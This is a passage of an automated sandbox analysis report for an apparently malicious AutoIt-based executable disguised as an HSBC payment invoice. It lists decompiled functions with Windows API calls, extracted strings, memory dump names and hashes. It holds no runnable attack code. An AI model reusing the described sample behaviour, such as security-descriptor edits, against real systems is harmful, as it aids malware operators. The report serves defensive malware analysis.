                    • GetWindowRect.USER32(00000000), ref: 00F0A683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F0A69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F0A6B3
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: ee8c2bea68d263191d141cc1500ccf16ce99252c559f6f1757ba8d61f9ecf46e
                    • Instruction ID: b4c59319abf7c3e8fc0ded06793965157fa586900484f4bc7a6aded21fee3d66
                    • Opcode Fuzzy Hash: ee8c2bea68d263191d141cc1500ccf16ce99252c559f6f1757ba8d61f9ecf46e
                    • Instruction Fuzzy Hash: AC717471550309AFD720CF28CC49F6A7BE6FB89314F080528F985972A1CB72E946EB12
                    Function 00F04619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00F046AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F046F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 79418cafd34083aa6c2e7ee19f7c91f00c03468a4d077394e83c6e070978d5ce
                    • Instruction ID: b6e21e36067b3aec342fead48486898c200eee836e418529acef6f5f2c35f5ca
                    • Opcode Fuzzy Hash: 79418cafd34083aa6c2e7ee19f7c91f00c03468a4d077394e83c6e070978d5ce
                    • Instruction Fuzzy Hash: 5C9161B56043019FCB14EF10C491A69B7E1AF89314F04986DF99A6B3A3DB31FD46EB41
                    Function 00F0BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F0BB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F09431), ref: 00F0BBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0BC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F0BC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0BC7D
                    • FreeLibrary.KERNEL32(?), ref: 00F0BC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0BC99
                    • DestroyCursor.USER32(?), ref: 00F0BCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F0BCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F0BCD1
                      • Part of subcall function 00EA313D: __wcsicmp_l.LIBCMT ref: 00EA31C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 3907162815-1154884017
                    • Opcode ID: da44301b13f419730a5b517d9db266d62fcad3e164f98ed7ff53d3b50b37eef0
                    • Instruction ID: 470cf14c45b2776922dc8c4f0a4ad479bd05a9f8ef026a31d887ad91d86240e6
                    • Opcode Fuzzy Hash: da44301b13f419730a5b517d9db266d62fcad3e164f98ed7ff53d3b50b37eef0
                    • Instruction Fuzzy Hash: 5161BFB1900219BBEB24DF64CC45FBE77A8FB08720F108519F915EA1D1DB74A994FBA0
                    Function 00EEA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • CharLowerBuffW.USER32(?,?), ref: 00EEA636
                    • GetDriveTypeW.KERNEL32 ref: 00EEA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA730
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 25dd0761d46dc90f9904b571607fef360923be28a10b930518c59f33a924a916
                    • Instruction ID: af3912b8cbe97bdb137ef28a7b05a634c4c49ca18849fb85c64254290dc61095
                    • Opcode Fuzzy Hash: 25dd0761d46dc90f9904b571607fef360923be28a10b930518c59f33a924a916
                    • Instruction Fuzzy Hash: DA514B711047099FC704EF21C88186AB7F4FF98718F18596DF89A672A1DB31EE0ACB52
                    Function 00EEA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EEA47A
                    • __swprintf.LIBCMT ref: 00EEA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EEA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EEA4FE
                    • _memset.LIBCMT ref: 00EEA51D
                    • _wcsncpy.LIBCMT ref: 00EEA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EEA58E
                    • CloseHandle.KERNEL32(00000000), ref: 00EEA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 00EEA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 00EEA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 4258469a1cd6249fd081143ad10730f3085f1c7f57b08c171ac19e508952ff5f
                    • Instruction ID: ab7e82c615cf0ae137c06ad25dab49f0331391736e5b5a353c43ca53c7a03304
                    • Opcode Fuzzy Hash: 4258469a1cd6249fd081143ad10730f3085f1c7f57b08c171ac19e508952ff5f
                    • Instruction Fuzzy Hash: D131B37150024DABDB21DFA1DC49FEB77BCEF89705F1450BAF508E6160E770A6488B25
                    Function 00ED83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                      • Part of subcall function 00ED874A: GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                      • Part of subcall function 00ED874A: GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                      • Part of subcall function 00ED874A: RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                      • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                      • Part of subcall function 00ED87E7: GetProcessHeap.KERNEL32(00000008,00ED8240,00000000,00000000,?,00ED8240,?), ref: 00ED87F3
                      • Part of subcall function 00ED87E7: RtlAllocateHeap.NTDLL(00000000,?,00ED8240), ref: 00ED87FA
                      • Part of subcall function 00ED87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ED8240,?), ref: 00ED880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ED8458
                    • _memset.LIBCMT ref: 00ED846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ED848C
                    • GetLengthSid.ADVAPI32(?), ref: 00ED849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00ED84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ED84F6
                    • GetLengthSid.ADVAPI32(?), ref: 00ED8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ED8522
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ED854A
                    • CopySid.ADVAPI32(00000000), ref: 00ED8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ED8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ED85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ED85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 2347767575-0
                    • Opcode ID: fe7f76114e246ed8213e3046374da47df22d25fd00925e68dd8417e56ac08e79
                    • Instruction ID: 3b9108c4249c061764936c63d97b23a9605cc2da2bad68b8904f5ea22e37cb1d
                    • Opcode Fuzzy Hash: fe7f76114e246ed8213e3046374da47df22d25fd00925e68dd8417e56ac08e79
                    • Instruction Fuzzy Hash: C0614B71900209AFDF10DFA5ED45AAEBBB9FF04314F04816AF815B7291DB319A06DF60
                    Function 00EF762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 00EF76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EF76AE
                    • CreateCompatibleDC.GDI32(?), ref: 00EF76BA
                    • SelectObject.GDI32(00000000,?), ref: 00EF76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EF771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EF7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EF777B
                    • SelectObject.GDI32(00000006,?), ref: 00EF7783
                    • DeleteObject.GDI32(?), ref: 00EF778C
                    • DeleteDC.GDI32(00000006), ref: 00EF7793
                    • ReleaseDC.USER32(00000000,?), ref: 00EF779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 554082c2ca41dd82b92063aafec206bd964873d7861d60ab2a6d137441cb0c8d
                    • Instruction ID: 6ba96322f91c9953caa88abea549b3e04c7f11a21e4634d42e77f2a26bdd0b5e
                    • Opcode Fuzzy Hash: 554082c2ca41dd82b92063aafec206bd964873d7861d60ab2a6d137441cb0c8d
                    • Instruction Fuzzy Hash: AF515E75904209EFCB25CFA8CC84EAEBBB9FF48310F14842DF989A7250D731A844CB50
                    Function 00EEA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                    Download Yara Rule
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,00F0FB78), ref: 00EEA0FC
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EEA11E
                    • __swprintf.LIBCMT ref: 00EEA177
                    • __swprintf.LIBCMT ref: 00EEA190
                    • _wprintf.LIBCMT ref: 00EEA246
                    • _wprintf.LIBCMT ref: 00EEA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 311963372-2391861430
                    • Opcode ID: e12155c4f70c568ceb1d739a863159a47ce012658298c0bde50e48eb8d6519df
                    • Instruction ID: 910718ba1e28899ab2263696ddf29d941ba011118c3518345a50d45273729973
                    • Opcode Fuzzy Hash: e12155c4f70c568ceb1d739a863159a47ce012658298c0bde50e48eb8d6519df
                    • Instruction Fuzzy Hash: 9251607190420DAACF15FBE0CD86EEEB7B8AF19304F241165F509720A1EB71AF58DB61
                    Function 00E86BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EA0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E86C6C,?,00008000), ref: 00EA0BB7
                      • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E86D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E86E5A
                      • Part of subcall function 00E859CD: _wcscpy.LIBCMT ref: 00E85A05
                      • Part of subcall function 00EA387D: _iswctype.LIBCMT ref: 00EA3885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 75fc0036450c1ad5efbde682a4da1ddb7fff563047ebf0eeb563c3397ec5860b
                    • Instruction ID: 1e098d1257753c0d52bc39760599b1aa74e48b95daddb3aa781e0b70df4139c8
                    • Opcode Fuzzy Hash: 75fc0036450c1ad5efbde682a4da1ddb7fff563047ebf0eeb563c3397ec5860b
                    • Instruction Fuzzy Hash: 43028C711083419FC724EF24C881AAFBBE5AF99354F14691DF4CEA72A1DB30DA49DB42
                    Function 00E845DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E845F9
                    • GetMenuItemCount.USER32(00F46890), ref: 00EBD7CD
                    • GetMenuItemCount.USER32(00F46890), ref: 00EBD87D
                    • GetCursorPos.USER32(?), ref: 00EBD8C1
                    • SetForegroundWindow.USER32(00000000), ref: 00EBD8CA
                    • TrackPopupMenuEx.USER32(00F46890,00000000,?,00000000,00000000,00000000), ref: 00EBD8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EBD8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: 6032841d8f4df762802bfd9536e6bc08c6aa4f4cff35378c8ba561768759cc0a
                    • Instruction ID: 059d87070c489a07f1e652c6c18a15c362cbc9280f8329e241c701844e0d531e
                    • Opcode Fuzzy Hash: 6032841d8f4df762802bfd9536e6bc08c6aa4f4cff35378c8ba561768759cc0a
                    • Instruction Fuzzy Hash: 4B71E57060421ABEEB319F15DC45FEABF69FF05368F241216F618B61E0DBB15810EB94
                    Function 00F010A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: a3ff92cb1cf77273963ed297fb0d0ba7e6faff169f6003a48f2725eb55a0e534
                    • Instruction ID: 85924ce4f3aed570a893fb6e10a228deb4a364f2635edc88d7be56b56058cd7c
                    • Opcode Fuzzy Hash: a3ff92cb1cf77273963ed297fb0d0ba7e6faff169f6003a48f2725eb55a0e534
                    • Instruction Fuzzy Hash: 8E417C7154024E8BDF14EF90DCA1AEA37A5BF2A320F104454FD956B292DB30A91AEB60
                    Function 00EE5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                      • Part of subcall function 00E87A84: _memmove.LIBCMT ref: 00E87B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EE55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EE55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EE55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EE560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EE561C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: b3c77f9304bb68b54acd792140e05da764b92156c96a9b86a802f1604bf9d2a5
                    • Instruction ID: 985e436b34019d2e24a5f752bb65714130bb6cd405a1dfdf20efda7e7ac85b18
                    • Opcode Fuzzy Hash: b3c77f9304bb68b54acd792140e05da764b92156c96a9b86a802f1604bf9d2a5
